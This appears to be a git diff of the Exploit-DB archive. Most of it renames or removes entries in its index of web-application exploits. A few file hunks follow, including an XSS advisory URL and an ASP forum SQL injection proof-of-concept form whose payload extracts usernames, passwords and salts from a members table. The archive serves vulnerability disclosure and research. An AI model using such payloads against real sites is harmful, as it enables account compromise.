-5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'Directory.php cat_id' SQL Injection",2008-04-28,K-159,php,webapps,0
-5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script (host_id) - SQL Injection",2008-04-28,K-159,php,webapps,0
-5520,platforms/php/webapps/5520.txt,"Joovili 3.1 - (browse.videos.php category) SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0
+5516,platforms/php/webapps/5516.txt,"Prozilla Hosting Index - 'cat_id' Parameter SQL Injection",2008-04-28,K-159,php,webapps,0
+5517,platforms/php/webapps/5517.txt,"Softbiz Web Host Directory Script - 'host_id' Parameter SQL Injection",2008-04-28,K-159,php,webapps,0
+5520,platforms/php/webapps/5520.txt,"Joovili 3.1 - 'browse.videos.php' SQL Injection",2008-04-28,HaCkeR_EgY,php,webapps,0
 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 - File Disclosure",2008-04-29,"Roberto Suggi Liverani",php,webapps,0
 5522,platforms/php/webapps/5522.txt,"LokiCMS 0.3.3 - Arbitrary File Delete",2008-04-29,cOndemned,php,webapps,0
 5523,platforms/php/webapps/5523.txt,"Project Based Calendaring System (PBCS) 0.7.1 - Multiple Vulnerabilities",2008-04-30,GoLd_M,php,webapps,0
@@ -18992,7 +18995,7 @@ id,file,description,date,author,platform,type,port
 5955,platforms/php/webapps/5955.txt,"Orca 2.0/2.0.2 - (Parameters.php) Remote File Inclusion",2008-06-26,Ciph3r,php,webapps,0
 5956,platforms/php/webapps/5956.txt,"Keller Web Admin CMS 0.94 Pro - Local File Inclusion (2)",2008-06-26,StAkeR,php,webapps,0
 5957,platforms/php/webapps/5957.txt,"OTManager CMS 24a - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-27,"CWH Underground",php,webapps,0
-5958,platforms/php/webapps/5958.txt,"w1l3d4 philboard 1.2 - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-06-27,Bl@ckbe@rD,php,webapps,0
+5958,platforms/php/webapps/5958.txt,"W1L3D4 philboard 1.2 - Blind SQL Injection / Cross-Site Scripting",2008-06-27,Bl@ckbe@rD,php,webapps,0
 5959,platforms/php/webapps/5959.txt,"OTManager CMS 2.4 - Insecure Cookie Handling",2008-06-27,"Virangar Security",php,webapps,0
 5960,platforms/php/webapps/5960.txt,"SePortal 2.4 - (poll.php poll_id) SQL Injection",2008-06-27,Mr.SQL,php,webapps,0
 5961,platforms/php/webapps/5961.txt,"PHP-Fusion Mod Classifieds - 'lid' Parameter SQL Injection",2008-06-27,boom3rang,php,webapps,0
@@ -19733,7 +19736,7 @@ id,file,description,date,author,platform,type,port
 6953,platforms/php/webapps/6953.txt,"Maran PHP Shop - 'prod.php cat' SQL Injection",2008-11-02,JosS,php,webapps,0
 6954,platforms/php/webapps/6954.txt,"Maran PHP Shop - 'admin.php' Insecure Cookie Handling",2008-11-02,JosS,php,webapps,0
 6955,platforms/php/webapps/6955.txt,"Joovili 3.1.4 - Insecure Cookie Handling",2008-11-02,ZoRLu,php,webapps,0
-6956,platforms/php/webapps/6956.txt,"apartment search script - (Arbitrary File Upload / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-02,ZoRLu,php,webapps,0
+6956,platforms/php/webapps/6956.txt,"Apartment Search Script - Arbitrary File Upload / Cross-Site Scripting",2008-11-02,ZoRLu,php,webapps,0
 6957,platforms/php/webapps/6957.txt,"NetRisk 2.0 - Cross-Site Scripting / SQL Injection",2008-11-02,StAkeR,php,webapps,0
 6958,platforms/php/webapps/6958.txt,"Maran PHP Shop - 'prodshow.php' SQL Injection",2008-11-02,d3v1l,php,webapps,0
 6960,platforms/php/webapps/6960.txt,"1st News - 'products.php id' SQL Injection",2008-11-02,TR-ShaRk,php,webapps,0
@@ -19819,7 +19822,7 @@ id,file,description,date,author,platform,type,port
 7046,platforms/php/webapps/7046.txt,"MyioSoft EasyCalendar - (Authentication Bypass) SQL Injection",2008-11-07,ZoRLu,php,webapps,0
 7047,platforms/php/webapps/7047.txt,"DELTAScripts PHP Classifieds 7.5 - SQL Injection",2008-11-07,ZoRLu,php,webapps,0
 7048,platforms/php/webapps/7048.txt,"E-topbiz Online Store 1 - 'cat_id' SQL Injection",2008-11-07,Stack,php,webapps,0
-7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - (File Disclosure / Cross-Site Scripting) Multiple Vulnerabilities",2008-11-07,ahmadbady,php,webapps,0
+7049,platforms/php/webapps/7049.txt,"Mini Web Calendar 1.2 - File Disclosure / Cross-Site Scripting",2008-11-07,ahmadbady,php,webapps,0
 7050,platforms/php/webapps/7050.txt,"E-topbiz Number Links 1 - 'id' SQL Injection",2008-11-07,"Hussin X",php,webapps,0
 7052,platforms/php/webapps/7052.txt,"Domain Seller Pro 1.5 - 'id' SQL Injection",2008-11-07,TR-ShaRk,php,webapps,0
 7053,platforms/php/webapps/7053.txt,"Myiosoft EasyBookMarker 4 - (Parent) SQL Injection",2008-11-07,G4N0K,php,webapps,0
@@ -19926,7 +19929,7 @@ id,file,description,date,author,platform,type,port
 7189,platforms/php/webapps/7189.txt,"getaphpsite Auto Dealers - Arbitrary File Upload",2008-11-22,ZoRLu,php,webapps,0
 7190,platforms/php/webapps/7190.txt,"Ez Ringtone Manager - Multiple Remote File Disclosure Vulnerabilities",2008-11-22,b3hz4d,php,webapps,0
 7191,platforms/php/webapps/7191.php,"LoveCMS 1.6.2 Final (Simple Forum 3.1d) - Change Admin Password",2008-11-22,cOndemned,php,webapps,0
-7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' SQL Injection",2008-11-23,snakespc,php,webapps,0
+7195,platforms/php/webapps/7195.txt,"Prozilla Hosting Index - 'id' Parameter SQL Injection",2008-11-23,snakespc,php,webapps,0
 7197,platforms/php/webapps/7197.txt,"Goople CMS 1.7 - Arbitrary File Upload",2008-11-23,x0r,php,webapps,0
 7198,platforms/php/webapps/7198.txt,"Netartmedia Cars Portal 2.0 - (image.php id) SQL Injection",2008-11-23,snakespc,php,webapps,0
 7199,platforms/php/webapps/7199.txt,"Netartmedia Blog System - 'image.php id' SQL Injection",2008-11-23,snakespc,php,webapps,0
@@ -19965,7 +19968,7 @@ id,file,description,date,author,platform,type,port
 7239,platforms/php/webapps/7239.txt,"ParsBlogger - 'blog.asp wr' SQL Injection",2008-11-26,"BorN To K!LL",php,webapps,0
 7240,platforms/php/webapps/7240.txt,"Star Articles 6.0 - Blind SQL Injection (1)",2008-11-26,b3hz4d,php,webapps,0
 7241,platforms/php/webapps/7241.txt,"TxtBlog 1.0 Alpha - (index.php m) Local File Inclusion",2008-11-27,"CWH Underground",php,webapps,0
-7242,platforms/php/webapps/7242.txt,"web Calendar system 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0
+7242,platforms/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps,0
 7243,platforms/php/webapps/7243.php,"Star Articles 6.0 - Blind SQL Injection (2)",2008-11-27,Stack,php,webapps,0
 7244,platforms/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - (SQL Injection / Cross-Site Scripting / File Disclosure) Multiple Vulnerabilities",2008-11-27,Pouya_Server,php,webapps,0
 7245,platforms/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps,0
@@ -19974,7 +19977,7 @@ id,file,description,date,author,platform,type,port
 7248,platforms/php/webapps/7248.txt,"Family Project 2.x - (Authentication Bypass) SQL Injection",2008-11-27,The_5p3ctrum,php,webapps,0
 7250,platforms/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - (subcategory_id) SQL Injection",2008-11-27,XaDoS,php,webapps,0
 7251,platforms/php/webapps/7251.txt,"Star Articles 6.0 - Arbitrary File Upload",2008-11-27,ZoRLu,php,webapps,0
-7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0
+7252,platforms/php/webapps/7252.txt,"Web Calendar 4.1 - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps,0
 7253,platforms/php/webapps/7253.txt,"Booking Centre 2.01 - (HotelID) SQL Injection",2008-11-27,R3d-D3V!L,php,webapps,0
 7254,platforms/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - (Authentication Bypass) SQL Injection",2008-11-27,Cyber-Zone,php,webapps,0
 7255,platforms/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps,0
@@ -19984,7 +19987,7 @@ id,file,description,date,author,platform,type,port
 7260,platforms/php/webapps/7260.txt,"Basic-CMS - 'acm2000.mdb' Remote Database Disclosure",2008-11-28,Stack,php,webapps,0
 7261,platforms/php/webapps/7261.txt,"Basic-CMS - 'index.php id' Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps,0
 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - (Authentication Bypass) SQL Injection",2008-11-28,MrDoug,php,webapps,0
-7265,platforms/php/webapps/7265.txt,"web Calendar system 3.40 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities",2008-11-28,Bl@ckbe@rD,php,webapps,0
+7265,platforms/php/webapps/7265.txt,"Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection",2008-11-28,Bl@ckbe@rD,php,webapps,0
 7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0
 7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0
 7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0
@@ -23356,7 +23359,7 @@ id,file,description,date,author,platform,type,port
 13927,platforms/php/webapps/13927.txt,"MarketSaz - Arbitrary File Upload",2010-06-18,NetQurd,php,webapps,0
 13929,platforms/php/webapps/13929.txt,"Banner Management Script - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
 13930,platforms/php/webapps/13930.txt,"Shopping Cart Script with Affiliate Program - SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
-13931,platforms/php/webapps/13931.txt,"KubeLance - 'profile.php?id' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
+13931,platforms/php/webapps/13931.txt,"KubeLance 1.7.6 - 'profile.php' SQL Injection",2010-06-18,"L0rd CrusAd3r",php,webapps,0
 13933,platforms/php/webapps/13933.txt,"UK One Media CMS - 'id' Error-Based SQL Injection",2010-06-19,LiquidWorm,php,webapps,0
 13935,platforms/php/webapps/13935.txt,"Joomla! Component 'RSComments' 1.0.0 - Persistent Cross-Site Scripting",2010-06-19,jdc,php,webapps,0
 13936,platforms/php/webapps/13936.txt,"Elite Gaming Ladders 3.5 - SQL Injection (ladder[id])",2010-06-19,ahwak2000,php,webapps,0
@@ -27809,7 +27812,7 @@ id,file,description,date,author,platform,type,port
 25983,platforms/cfm/webapps/25983.txt,"Simple Message Board 2.0 beta1 - User.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0
 25984,platforms/cfm/webapps/25984.txt,"Simple Message Board 2.0 beta1 - Thread.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0
 25985,platforms/cfm/webapps/25985.txt,"Simple Message Board 2.0 beta1 - Search.cfm Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0
-25990,platforms/php/webapps/25990.txt,"Clever Copy 2.0 - calendar.php Cross-Site Scripting",2005-07-15,Lostmon,php,webapps,0
+25990,platforms/php/webapps/25990.txt,"Clever Copy 2.0 - 'calendar.php' Cross-Site Scripting",2005-07-15,Lostmon,php,webapps,0
 25994,platforms/php/webapps/25994.txt,"osCommerce 2.2 - update.php Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps,0
 25995,platforms/php/webapps/25995.txt,"e107 Website System 0.6 - Nested BBCode URL Tag Script Injection",2005-07-18,"Nick Griffin",php,webapps,0
 25996,platforms/php/webapps/25996.txt,"Ruubikcms 1.1.1 - Persistent Cross-Site Scripting",2013-06-07,expl0i13r,php,webapps,0
@@ -27841,8 +27844,8 @@ id,file,description,date,author,platform,type,port
 26033,platforms/asp/webapps/26033.txt,"CartWIZ 1.10/1.20 - viewcart.asp Cross-Site Scripting",2005-07-26,Zinho,asp,webapps,0
 26034,platforms/php/webapps/26034.txt,"NETonE PHPBook 1.4.6 - Guestbook.php Cross-Site Scripting",2005-07-26,rgod,php,webapps,0
 26036,platforms/php/webapps/26036.txt,"PNG Counter 1.0 - Demo.php Cross-Site Scripting",2005-07-26,ArCaX-ATH,php,webapps,0
-26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - results.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
-26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - categorysearch.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
+26037,platforms/php/webapps/26037.txt,"Clever Copy 2.0 - 'results.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
+26038,platforms/php/webapps/26038.txt,"Clever Copy 2.0 - 'categorysearch.php' Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
 26039,platforms/php/webapps/26039.txt,"BMForum 3.0 - topic.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
 26040,platforms/php/webapps/26040.txt,"BMForum 3.0 - forums.php Multiple Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
 26041,platforms/php/webapps/26041.txt,"BMForum 3.0 - post.php forumid Parameter Cross-Site Scripting",2005-07-27,Lostmon,php,webapps,0
@@ -28496,8 +28499,8 @@ id,file,description,date,author,platform,type,port
 26870,platforms/php/webapps/26870.txt,"Advanced Guestbook 2.x - Multiple Cross-Site Scripting Vulnerabilities",2005-12-19,Handrix,php,webapps,0
 26871,platforms/php/webapps/26871.txt,"PlaySms - 'index.php' Cross-Site Scripting",2005-12-19,mohajali2k4,php,webapps,0
 26872,platforms/php/webapps/26872.txt,"PHP-Fusion 6.0 - 'members.php' Cross-Site Scripting",2005-12-19,krasza,php,webapps,0
-26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - default.asp ID Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0
-26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - acidcat.mdb Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0
+26873,platforms/asp/webapps/26873.txt,"Acidcat CMS 2.1.13 - 'ID' Parameter SQL Injection",2005-12-19,admin@hamid.ir,asp,webapps,0
+26874,platforms/asp/webapps/26874.txt,"Acidcat CMS 2.1.13 - 'acidcat.mdb' Remote Information Disclosure",2005-12-19,admin@hamid.ir,asp,webapps,0
 26875,platforms/asp/webapps/26875.txt,"allinta CMS 2.3.2 - faq.asp s Parameter Cross-Site Scripting",2005-12-19,r0t3d3Vil,asp,webapps,0
 26876,platforms/asp/webapps/26876.txt,"allinta CMS 2.3.2 - search.asp searchQuery Parameter Cross-Site Scripting",2005-12-19,r0t3d3Vil,asp,webapps,0
 26877,platforms/php/webapps/26877.txt,"Box UK Amaxus CMS 3.0 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0
@@ -28516,7 +28519,7 @@ id,file,description,date,author,platform,type,port
 26895,platforms/php/webapps/26895.txt,"Magnolia Search Module 2.1 - Cross-Site Scripting",2005-12-19,r0t3d3Vil,php,webapps,0
 26896,platforms/php/webapps/26896.txt,"ContentServ 3.0/3.1/4.0 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps,0
 26897,platforms/php/webapps/26897.txt,"Direct News 4.9 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps,0
-26898,platforms/php/webapps/26898.txt,"ODFaq 2.1 - faq.php SQL Injection",2005-12-19,r0t,php,webapps,0
+26898,platforms/php/webapps/26898.txt,"ODFaq 2.1 - 'faq.php' SQL Injection",2005-12-19,r0t,php,webapps,0
 26899,platforms/php/webapps/26899.txt,"Marwel 2.7 - 'index.php' SQL Injection",2005-12-19,r0t,php,webapps,0
 26900,platforms/php/webapps/26900.txt,"Miraserver 1.0 RC4 - 'index.php' page Parameter SQL Injection",2005-12-19,r0t,php,webapps,0
 26901,platforms/php/webapps/26901.txt,"Miraserver 1.0 RC4 - newsitem.php id Parameter SQL Injection",2005-12-19,r0t,php,webapps,0
@@ -29507,7 +29510,7 @@ id,file,description,date,author,platform,type,port
 28248,platforms/php/webapps/28248.txt,"IDevSpot PHPHostBot 1.0 - 'index.php' Remote File Inclusion",2006-07-20,r0t,php,webapps,0
 28249,platforms/php/webapps/28249.txt,"GeoAuctions 1.0.6 Enterprise - 'index.php' d Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
 28250,platforms/php/webapps/28250.txt,"Geodesic Solutions Multiple Products - 'index.php' b Parameter SQL Injection",2006-07-20,LBDT,php,webapps,0
-28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - news.php Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0
+28251,platforms/php/webapps/28251.txt,"MiniBB 1.5 - 'news.php' Remote File Inclusion",2006-07-20,AG-Spider,php,webapps,0
 28253,platforms/php/webapps/28253.txt,"Advanced Poll 2.0.2 - common.inc.php Remote File Inclusion",2006-07-21,Solpot,php,webapps,0
 28255,platforms/php/webapps/28255.txt,"Chameleon LE 1.203 - 'index.php' Directory Traversal",2006-07-21,kicktd,php,webapps,0
 28260,platforms/php/webapps/28260.txt,"Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion",2006-07-24,MFox,php,webapps,0
@@ -30934,7 +30937,7 @@ id,file,description,date,author,platform,type,port
 30331,platforms/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0
 30332,platforms/asp/webapps/30332.txt,"Image Racer - searchresults.asp SQL Injection",2007-07-23,"Aria-Security Team",asp,webapps,0
 30333,platforms/php/webapps/30333.txt,"PHMe 0.0.2 - Function_List.php Local File Inclusion",2007-07-23,You_You,php,webapps,0
-30382,platforms/asp/webapps/30382.txt,"W1L3D4 philboard 0.3 - W1L3D4_Aramasonuc.asp Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0
+30382,platforms/asp/webapps/30382.txt,"W1L3D4 philboard 0.3 - Cross-Site Scripting",2007-07-25,GeFORC3,asp,webapps,0
 30378,platforms/php/webapps/30378.txt,"Webbler CMS 3.1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",php,webapps,0
 30379,platforms/php/webapps/30379.html,"Webbler CMS 3.1.3 - Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",php,webapps,0
 30380,platforms/php/webapps/30380.txt,"CPanel 10.9.1 - Resname Parameter Cross-Site Scripting",2007-07-24,"Aria-Security Team",php,webapps,0
@@ -30997,7 +31000,7 @@ id,file,description,date,author,platform,type,port
 30453,platforms/php/webapps/30453.txt,"snif 1.5.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0
 30456,platforms/php/webapps/30456.txt,"VietPHP - _functions.php dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
 30457,platforms/php/webapps/30457.txt,"VietPHP - admin/index.php language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
-30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - Password Parameter SQL Injection",2007-11-26,JosS,php,webapps,0
+30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - 'Password' Parameter SQL Injection",2007-11-26,JosS,php,webapps,0
 30459,platforms/php/webapps/30459.txt,"VietPHP - 'index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0
 30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - YABBSE.INC.php Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0
 30900,platforms/hardware/webapps/30900.html,"Feixun Wireless Router FWR-604H - Remote Code Execution",2014-01-14,"Arash Abedian",hardware,webapps,80
@@ -31794,7 +31797,6 @@ id,file,description,date,author,platform,type,port
 31672,platforms/php/webapps/31672.txt,"uTorrent WebUI 0.310 Beta 2 - Cross-Site Request Forgery",2008-04-18,th3.r00k,php,webapps,0
 31673,platforms/multiple/webapps/31673.txt,"Azureus HTML WebUI 0.7.6 - Cross-Site Request Forgery",2008-04-18,th3.r00k,multiple,webapps,0
 31674,platforms/php/webapps/31674.txt,"XOOPS Recette 2.2 - 'detail.php' SQL Injection",2008-04-19,S@BUN,php,webapps,0
-31675,platforms/php/webapps/31675.txt,"Chimaera Project Aterr 0.9.1 - Multiple Local File Inclusion",2008-04-19,KnocKout,php,webapps,0
 31676,platforms/php/webapps/31676.txt,"Host Directory PRO - Cookie Security Bypass",2008-04-20,Crackers_Child,php,webapps,0
 31677,platforms/php/webapps/31677.txt,"Advanced Electron Forum 1.0.6 - 'beg' Parameter Cross-Site Scripting",2008-04-21,ZoRLu,php,webapps,0
 31678,platforms/php/webapps/31678.txt,"SMF 1.1.4 - Audio CAPTCHA Security Bypass",2008-04-21,"Michael Brooks",php,webapps,0
@@ -31813,7 +31815,6 @@ id,file,description,date,author,platform,type,port
 31705,platforms/php/webapps/31705.txt,"PHCDownload 1.1 - upload/install/index.php step Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0
 31708,platforms/php/webapps/31708.txt,"Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion",2008-04-26,NoGe,php,webapps,0
 31709,platforms/php/webapps/31709.txt,"Siteman 2.0.x2 - 'module' Parameter Cross-Site Scripting / Local File Inclusion",2008-04-26,"Khashayar Fereidani",php,webapps,0
-31712,platforms/php/webapps/31712.txt,"miniBB 2.2 - 'bb_admin.php' Cross-Site Scripting",2008-04-28,"Khashayar Fereidani",php,webapps,0
 31716,platforms/php/webapps/31716.txt,"VWar 1.6.1 R2 - Multiple Remote Vulnerabilities",2008-05-01,"Darren McDonald",php,webapps,0
 31717,platforms/php/webapps/31717.txt,"MJGUEST 6.7 - QT 'mjguest.php' Cross-Site Scripting",2008-05-01,"Khashayar Fereidani",php,webapps,0
 31719,platforms/php/webapps/31719.pl,"KnowledgeQuest 2.6 - Administration Multiple Authentication Bypass Vulnerabilities",2008-05-02,Cod3rZ,php,webapps,0
@@ -32096,7 +32097,7 @@ id,file,description,date,author,platform,type,port
 32120,platforms/asp/webapps/32120.txt,"Web Wiz Forum 9.5 - admin_category_details.asp mode Parameter Cross-Site Scripting",2008-07-28,CSDT,asp,webapps,0
 32121,platforms/php/webapps/32121.php,"Jamroom 3.3.8 - (Cookie Authentication Bypass and Unspecified Security Issues) Multiple Vulnerabilities",2008-07-28,"James Bercegay",php,webapps,0
 32122,platforms/php/webapps/32122.txt,"Owl Intranet Engine 0.95 - 'register.php' Cross-Site Scripting",2008-07-28,"Fabian Fingerle",php,webapps,0
-32123,platforms/php/webapps/32123.txt,"miniBB RSS 2.0 Plugin - Multiple Remote File Inclusion",2008-07-29,"Ghost Hacker",php,webapps,0
+32123,platforms/php/webapps/32123.txt,"MiniBB RSS 2.0 Plugin - Multiple Remote File Inclusion",2008-07-29,"Ghost Hacker",php,webapps,0
 32126,platforms/php/webapps/32126.txt,"ScrewTurn Software ScrewTurn Wiki 2.0.x - 'System Log' Page HTML Injection",2008-05-11,Portcullis,php,webapps,0
 32128,platforms/php/webapps/32128.txt,"MJGUEST 6.8 - 'Guestbook.js.php' Cross-Site Scripting",2008-07-30,DSecRG,php,webapps,0
 32130,platforms/php/webapps/32130.txt,"DEV Web Management System 1.5 - Multiple Input Validation Vulnerabilities",2008-07-30,Dr.Crash,php,webapps,0
@@ -32834,7 +32835,6 @@ id,file,description,date,author,platform,type,port
 33474,platforms/php/webapps/33474.txt,"Joomla! Component DM Orders - 'id' Parameter SQL Injection",2010-01-07,NoGe,php,webapps,0
 33475,platforms/php/webapps/33475.txt,"dotProject 2.1.3 - Multiple SQL Injections / HTML Injection Vulnerabilities",2010-01-07,"Justin C. Klein Keane",php,webapps,0
 33478,platforms/php/webapps/33478.txt,"Joomla! Component Jobads - 'type' Parameter SQL Injection",2010-01-08,N0KT4,php,webapps,0
-33481,platforms/asp/webapps/33481.txt,"DevWorx BlogWorx 1.0 - 'forum.asp' Cross-Site Scripting",2010-01-09,Cyber_945,asp,webapps,0
 33482,platforms/php/webapps/33482.txt,"DigitalHive - 'mt' Parameter Cross-Site Scripting",2010-01-10,ViRuSMaN,php,webapps,0
 33484,platforms/php/webapps/33484.txt,"DELTAScripts PHP Links 1.0 - 'email' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0
 33485,platforms/php/webapps/33485.txt,"Jamit Job Board - 'post_id' Parameter Cross-Site Scripting",2010-01-11,Crux,php,webapps,0
@@ -33064,7 +33064,6 @@ id,file,description,date,author,platform,type,port
 33922,platforms/php/webapps/33922.txt,"CH-CMS.ch 2 - Multiple Arbitrary File Upload Vulnerabilities",2010-03-15,EL-KAHINA,php,webapps,0
 33923,platforms/asp/webapps/33923.txt,"SamaGraph CMS - 'inside.aspx' SQL Injection",2010-03-11,K053,asp,webapps,0
 33925,platforms/php/webapps/33925.txt,"ecoCMS 18.4.2010 - 'admin.php' Cross-Site Scripting",2010-05-18,"High-Tech Bridge SA",php,webapps,0
-33927,platforms/php/webapps/33927.txt,"eZoneScripts Apartment Search Script - 'listtest.php' SQL Injection",2010-02-09,JIKO,php,webapps,0
 33953,platforms/php/webapps/33953.txt,"Zurmo CRM - Persistent Cross-Site Scripting",2014-07-02,Provensec,php,webapps,80
 33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products - 'n6plugindestructor.asp' Cross-Site Scripting",2010-05-07,"Ruben Santamarta",asp,webapps,0
 33954,platforms/php/webapps/33954.txt,"Kerio Control 8.3.1 - Blind SQL Injection",2014-07-02,"Khashayar Fereidani",php,webapps,4081
@@ -34094,7 +34093,7 @@ id,file,description,date,author,platform,type,port
 35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 - 'arama_islem.asp' Cross-Site Scripting",2011-04-07,"kurdish hackers team",asp,webapps,0
 35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting",2011-04-07,"AutoSec Tools",php,webapps,0
 35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion",2014-12-19,Wireghoul,php,webapps,0
-35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
+35579,platforms/php/webapps/35579.txt,"MiniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
 35582,platforms/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80
@@ -36817,3 +36816,4 @@ id,file,description,date,author,platform,type,port
 40804,platforms/php/webapps/40804.txt,"Wordpress Plugin Olimometer 2.56 - SQL Injection",2016-11-21,"TAD GROUP",php,webapps,0
 40809,platforms/php/webapps/40809.txt,"EasyPHP Devserver 16.1.1 - Cross-Site Request Forgery / Remote Command Execution",2016-11-22,hyp3rlinx,php,webapps,0
 40816,platforms/xml/webapps/40816.txt,"SAP NetWeaver AS JAVA - 'BC-BMT-BPM-DSK' XML External Entity Injection",2016-11-22,ERPScan,xml,webapps,0
+40826,platforms/php/webapps/40826.py,"Osticket 1.9.14 - 'X-Forwarded-For' Cross-Site Scripting",2016-11-24,"Joaquin Ramirez Martinez",php,webapps,0

platforms/asp/webapps/33481.txt

@@ -1,9 +0,0 @@
-source: http://www.securityfocus.com/bid/37695/info
-
-DevWorx BlogWorx is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
-
-An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
-
-BlogWorx 1.0 is vulnerable; other versions may be affected as well.
-
-http://www.example.com/openforum/forum.asp?fid=12&ofact=1&ofmsgid=227&ofdisp=[XSS-Vuln] 

platforms/asp/webapps/5507.txt

@@ -40,7 +40,7 @@ A complete, fully featured ASP website system. Includes an extremely powerful fo
 
     3.1. "/forums/attach-file.asp" SQL Inection POC:
      -------------
-        <form ENCTYPE="multipart/form-data" method="post" action="http://[Site URL]/forums/attach-file.asp?action=postupload&amp;mid=[YOUR MSG ID]&amp;attachmentid=1 or 1=convert(int,(select top 1 username%2bpassword%2bsalt from members where username<>''))">
+        <form ENCTYPE="multipart/form-data" method="post" action="http://[Site URL]/forums/attach-file.asp?action=postupload&mid=[YOUR MSG ID]&attachmentid=1 or 1=convert(int,(select top 1 username%2bpassword%2bsalt from members where username<>''))">
         File : <input type='file' name='attachment' size='40'>
         <br />
         <input type='submit' value='Submit'>

platforms/multiple/remote/40824.py

@@ -0,0 +1,331 @@
+'''
+=============================================
